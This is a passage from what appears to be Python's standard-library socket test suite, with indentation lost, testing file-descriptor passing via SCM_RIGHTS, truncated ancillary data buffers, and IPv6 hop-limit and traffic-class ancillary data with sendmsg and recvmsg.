# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(last, array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_SPACE(n)
self.assertGreaterEqual(ret, last)
self.assertGreaterEqual(ret, socket.CMSG_LEN(n))
self.assertGreaterEqual(ret, n + socket.CMSG_LEN(0))
self.assertLessEqual(ret, self.socklen_t_limit)
last = ret
self.assertRaises(OverflowError, socket.CMSG_SPACE, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_SPACE, toobig)
self.assertRaises(OverflowError, socket.CMSG_SPACE, sys.maxsize)
class SCMRightsTest(SendrecvmsgServerTimeoutBase):
# Tests for file descriptor passing on Unix-domain sockets.
# Invalid file descriptor value that's unlikely to evaluate to a
# real FD even if one of its bytes is replaced with a different
# value (which shouldn't actually happen).
badfd = -0x5555
def newFDs(self, n):
# Return a list of n file descriptors for newly-created files
# containing their list indices as ASCII numbers.
fds = []
for i in range(n):
fd, path = tempfile.mkstemp()
self.addCleanup(os.unlink, path)
self.addCleanup(os.close, fd)
os.write(fd, str(i).encode())
fds.append(fd)
return fds
def checkFDs(self, fds):
# Check that the file descriptors in the given list contain
# their correct list indices as ASCII numbers.
for n, fd in enumerate(fds):
os.lseek(fd, 0, os.SEEK_SET)
self.assertEqual(os.read(fd, 1024), str(n).encode())
def registerRecvmsgResult(self, result):
self.addCleanup(self.closeRecvmsgFDs, result)
def closeRecvmsgFDs(self, recvmsg_result):
# Close all file descriptors specified in the ancillary data
# of the given return value from recvmsg() or recvmsg_into().
for cmsg_level, cmsg_type, cmsg_data in recvmsg_result[1]:
if (cmsg_level == socket.SOL_SOCKET and
cmsg_type == socket.SCM_RIGHTS):
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
for fd in fds:
os.close(fd)
def createAndSendFDs(self, n):
# Send n new file descriptors created by newFDs() to the
# server, with the constant MSG as the non-ancillary data.
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(n)))]),
len(MSG))
def checkRecvmsgFDs(self, numfds, result, maxcmsgs=1, ignoreflags=0):
# Check that constant MSG was received with numfds file
# descriptors in a maximum of maxcmsgs control messages (which
# must contain only complete integers). By default, check
# that MSG_CTRUNC is unset, but ignore any flags in
# ignoreflags.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertIsInstance(ancdata, list)
self.assertLessEqual(len(ancdata), maxcmsgs)
fds = array.array("i")
for item in ancdata:
self.assertIsInstance(item, tuple)
cmsg_level, cmsg_type, cmsg_data = item
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data) % SIZEOF_INT, 0)
fds.frombytes(cmsg_data)
self.assertEqual(len(fds), numfds)
self.checkFDs(fds)
def testFDPassSimple(self):
# Pass a single FD (array read from bytes object).
self.checkRecvmsgFDs(1, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testFDPassSimple(self):
self.assertEqual(
self.sendmsgToServer(
[MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(1)).tobytes())]),
len(MSG))
def testMultipleFDPass(self):
# Pass multiple FDs in a single array.
self.checkRecvmsgFDs(4, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testMultipleFDPass(self):
self.createAndSendFDs(4)
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassCMSG_SPACE(self):
# Test using CMSG_SPACE() to calculate ancillary buffer size.
self.checkRecvmsgFDs(
4, self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(4 * SIZEOF_INT)))
@testFDPassCMSG_SPACE.client_skip
def _testFDPassCMSG_SPACE(self):
self.createAndSendFDs(4)
def testFDPassCMSG_LEN(self):
# Test using CMSG_LEN() to calculate ancillary buffer size.
self.checkRecvmsgFDs(1,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(4 * SIZEOF_INT)),
# RFC 3542 says implementations may set
# MSG_CTRUNC if there isn't enough space
# for trailing padding.
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassCMSG_LEN(self):
self.createAndSendFDs(1)
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(AIX, "skipping, see issue #22397")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparate(self):
# Pass two FDs in two separate arrays. Arrays may be combined
# into a single control message by the OS.
self.checkRecvmsgFDs(2,
self.doRecvmsg(self.serv_sock, len(MSG), 10240),
maxcmsgs=2)
@testFDPassSeparate.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(AIX, "skipping, see issue #22397")
def _testFDPassSeparate(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(AIX, "skipping, see issue #22397")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparateMinSpace(self):
# Pass two FDs in two separate arrays, receiving them into the
# minimum space for two arrays.
num_fds = 2
self.checkRecvmsgFDs(num_fds,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(SIZEOF_INT * num_fds)),
maxcmsgs=2, ignoreflags=socket.MSG_CTRUNC)
@testFDPassSeparateMinSpace.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(AIX, "skipping, see issue #22397")
def _testFDPassSeparateMinSpace(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
def sendAncillaryIfPossible(self, msg, ancdata):
# Try to send msg and ancdata to server, but if the system
# call fails, just send msg with no ancillary data.
try:
nbytes = self.sendmsgToServer([msg], ancdata)
except OSError as e:
# Check that it was the system call that failed
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer([msg])
self.assertEqual(nbytes, len(msg))
@unittest.skipIf(sys.platform == "darwin", "see issue #24725")
def testFDPassEmpty(self):
# Try to pass an empty FD array. Can receive either no array
# or an empty array.
self.checkRecvmsgFDs(0, self.doRecvmsg(self.serv_sock,
len(MSG), 10240),
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassEmpty(self):
self.sendAncillaryIfPossible(MSG, [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
b"")])
def testFDPassPartialInt(self):
# Try to pass a truncated FD array.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertLess(len(cmsg_data), SIZEOF_INT)
def _testFDPassPartialInt(self):
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [self.badfd]).tobytes()[:-1])])
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassPartialIntInMiddle(self):
# Try to pass two FD arrays, the first of which is truncated.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 2)
fds = array.array("i")
# Arrays may have been combined in a single control message
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.assertLessEqual(len(fds), 2)
self.checkFDs(fds)
@testFDPassPartialIntInMiddle.client_skip
def _testFDPassPartialIntInMiddle(self):
fd0, fd1 = self.newFDs(2)
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0, self.badfd]).tobytes()[:-1]),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))])
def checkTruncatedHeader(self, result, ignoreflags=0):
# Check that no ancillary data items are returned when data is
# truncated inside the cmsghdr structure.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no buffer size
# is specified.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG)),
# BSD seems to set MSG_CTRUNC only
# if an item has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTruncNoBufSize(self):
self.createAndSendFDs(1)
def testCmsgTrunc0(self):
# Check that no ancillary data is received when buffer size is 0.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 0),
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTrunc0(self):
self.createAndSendFDs(1)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
def testCmsgTrunc1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 1))
def _testCmsgTrunc1(self):
self.createAndSendFDs(1)
def testCmsgTrunc2Int(self):
# The cmsghdr structure has at least three members, two of
# which are ints, so we still shouldn't see any ancillary
# data.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
SIZEOF_INT * 2))
def _testCmsgTrunc2Int(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Minus1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(0) - 1))
def _testCmsgTruncLen0Minus1(self):
self.createAndSendFDs(1)
# The following tests try to truncate the control message in the
# middle of the FD array.
def checkTruncatedArray(self, ancbuf, maxdata, mindata=0):
# Check that file descriptor data is truncated to between
# mindata and maxdata bytes when received with buffer size
# ancbuf, and that any complete file descriptor numbers are
# valid.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbuf)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
if mindata == 0 and ancdata == []:
return
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertGreaterEqual(len(cmsg_data), mindata)
self.assertLessEqual(len(cmsg_data), maxdata)
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.checkFDs(fds)
def testCmsgTruncLen0(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0), maxdata=0)
def _testCmsgTruncLen0(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Plus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0) + 1, maxdata=1)
def _testCmsgTruncLen0Plus1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(SIZEOF_INT),
maxdata=SIZEOF_INT)
def _testCmsgTruncLen1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen2Minus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(2 * SIZEOF_INT) - 1,
maxdata=(2 * SIZEOF_INT) - 1)
def _testCmsgTruncLen2Minus1(self):
self.createAndSendFDs(2)
class RFC3542AncillaryTest(SendrecvmsgServerTimeoutBase):
# Test sendmsg() and recvmsg[_into]() using the ancillary data
# features of the RFC 3542 Advanced Sockets API for IPv6.
# Currently we can only handle certain data items (e.g. traffic
# class, hop limit, MTU discovery and fragmentation settings)
# without resorting to unportable means such as the struct module,
# but the tests here are aimed at testing the ancillary data
# handling in sendmsg() and recvmsg() rather than the IPv6 API
# itself.
# Test value to use when setting hop limit of packet
hop_limit = 2
# Test value to use when setting traffic class of packet.
# -1 means "use kernel default".
traffic_class = -1
def ancillaryMapping(self, ancdata):
# Given ancillary data list ancdata, return a mapping from
# pairs (cmsg_level, cmsg_type) to corresponding cmsg_data.
# Check that no (level, type) pair appears more than once.
d = {}
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertNotIn((cmsg_level, cmsg_type), d)
d[(cmsg_level, cmsg_type)] = cmsg_data
return d
def checkHopLimit(self, ancbufsize, maxhop=255, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space. Check that data is MSG, ancillary data is not
# truncated (but ignore any flags in ignoreflags), and hop
# limit is between 0 and maxhop inclusive.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
self.assertIsInstance(ancdata[0], tuple)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimit(self):
# Test receiving the packet hop limit as ancillary data.
self.checkHopLimit(ancbufsize=10240)
@testRecvHopLimit.client_skip
def _testRecvHopLimit(self):
# Need to wait until server has asked to receive ancillary
# data, as implementations are not required to buffer it
# otherwise.
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimitCMSG_SPACE(self):
# Test receiving hop limit, using CMSG_SPACE to calculate buffer size.
self.checkHopLimit(ancbufsize=socket.CMSG_SPACE(SIZEOF_INT))
@testRecvHopLimitCMSG_SPACE.client_skip
def _testRecvHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Could test receiving into buffer sized using CMSG_LEN, but RFC
# 3542 says portable applications must provide space for trailing
# padding. Implementations may set MSG_CTRUNC if there isn't
# enough space for the padding.
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSetHopLimit(self):
# Test setting hop limit on outgoing packet and receiving it
# at the other end.
self.checkHopLimit(ancbufsize=10240, maxhop=self.hop_limit)
@testSetHopLimit.client_skip
def _testSetHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
def checkTrafficClassAndHopLimit(self, ancbufsize, maxhop=255,
ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space. Check that data is MSG, ancillary
# data is not truncated (but ignore any flags in ignoreflags),
# and traffic class and hop limit are in range (hop limit no
# more than maxhop).
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 2)
ancmap = self.ancillaryMapping(ancdata)
tcdata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS)]
self.assertEqual(len(tcdata), SIZEOF_INT)
a = array.array("i")
a.frombytes(tcdata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
hldata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT)]
self.assertEqual(len(hldata), SIZEOF_INT)
a = array.array("i")
a.frombytes(hldata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimit(self):
# Test receiving traffic class and hop limit as ancillary data.
self.checkTrafficClassAndHopLimit(ancbufsize=10240)
@testRecvTrafficClassAndHopLimit.client_skip
def _testRecvTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
# Test receiving traffic class and hop limit, using
# CMSG_SPACE() to calculate buffer size.
self.checkTrafficClassAndHopLimit(
ancbufsize=socket.CMSG_SPACE(SIZEOF_INT) * 2)
@testRecvTrafficClassAndHopLimitCMSG_SPACE.client_skip
def _testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSetTrafficClassAndHopLimit(self):
# Test setting traffic class and hop limit on outgoing packet,
# and receiving them at the other end.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testSetTrafficClassAndHopLimit.client_skip
def _testSetTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testOddCmsgSize(self):
# Try to send ancillary data with first item one byte too
# long. Fall back to sending with correct size if this fails,
# and check that second item was handled correctly.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testOddCmsgSize.client_skip
def _testOddCmsgSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
try:
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class]).tobytes() + b"\x00"),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
except OSError as e:
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
self.assertEqual(nbytes, len(MSG))
# Tests for proper handling of truncated ancillary data
def checkHopLimitTruncatedHeader(self, ancbufsize, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space, which should be too small to contain the ancillary
# data header (if ancbufsize is None, pass no second argument
# to recvmsg()). Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and no ancillary data is
# returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
args = () if ancbufsize is None else (ancbufsize,)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), *args)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no ancillary
# buffer size is provided.
self.checkHopLimitTruncatedHeader(ancbufsize=None,
# BSD seems to set
# MSG_CTRUNC only if an item
# has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
@testCmsgTruncNoBufSize.client_skip
def _testCmsgTruncNoBufSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc0(self):
# Check that no ancillary data is received when ancillary
# buffer size is zero.
self.checkHopLimitTruncatedHeader(ancbufsize=0,
ignoreflags=socket.MSG_CTRUNC)
@testSingleCmsgTrunc0.client_skip
def _testSingleCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=1)
@testSingleCmsgTrunc1.client_skip
def _testSingleCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc2Int(self):
self.checkHopLimitTruncatedHeader(ancbufsize=2 * SIZEOF_INT)
@testSingleCmsgTrunc2Int.client_skip
def _testSingleCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncLen0Minus1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=socket.CMSG_LEN(0) - 1)
@testSingleCmsgTruncLen0Minus1.client_skip
def _testSingleCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncInData(self):
# Test truncation of a control message inside its associated
# data. The message may be returned with its data truncated,
# or not returned at all.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG), socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertLess(len(cmsg_data), SIZEOF_INT)
@testSingleCmsgTruncInData.client_skip
def _testSingleCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
def checkTruncatedSecondHeader(self, ancbufsize, ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space, which should be large enough to
# contain the first item, but too small to contain the header
# of the second. Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and only one ancillary
# data item is returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertIn(cmsg_type, {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT})
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
# Try the above test with various buffer sizes.
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc0(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT),
ignoreflags=socket.MSG_CTRUNC)
@testSecondCmsgTrunc0.client_skip
def _testSecondCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) + 1)
@testSecondCmsgTrunc1.client_skip
def _testSecondCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc2Int(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
2 * SIZEOF_INT)
@testSecondCmsgTrunc2Int.client_skip
def _testSecondCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTruncLen0Minus1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(0) - 1)
@testSecondCmsgTruncLen0Minus1.client_skip
def _testSecondCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecomdCmsgTruncInData(self):
# Test truncation of the second of two control messages inside
# its associated data.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) + socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
cmsg_types = {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT}
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertLess(len(cmsg_data), SIZEOF_INT)
self.assertEqual(ancdata, [])
@testSecomdCmsgTruncInData.client_skip
def _testSecomdCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Derive concrete test classes for different socket types.
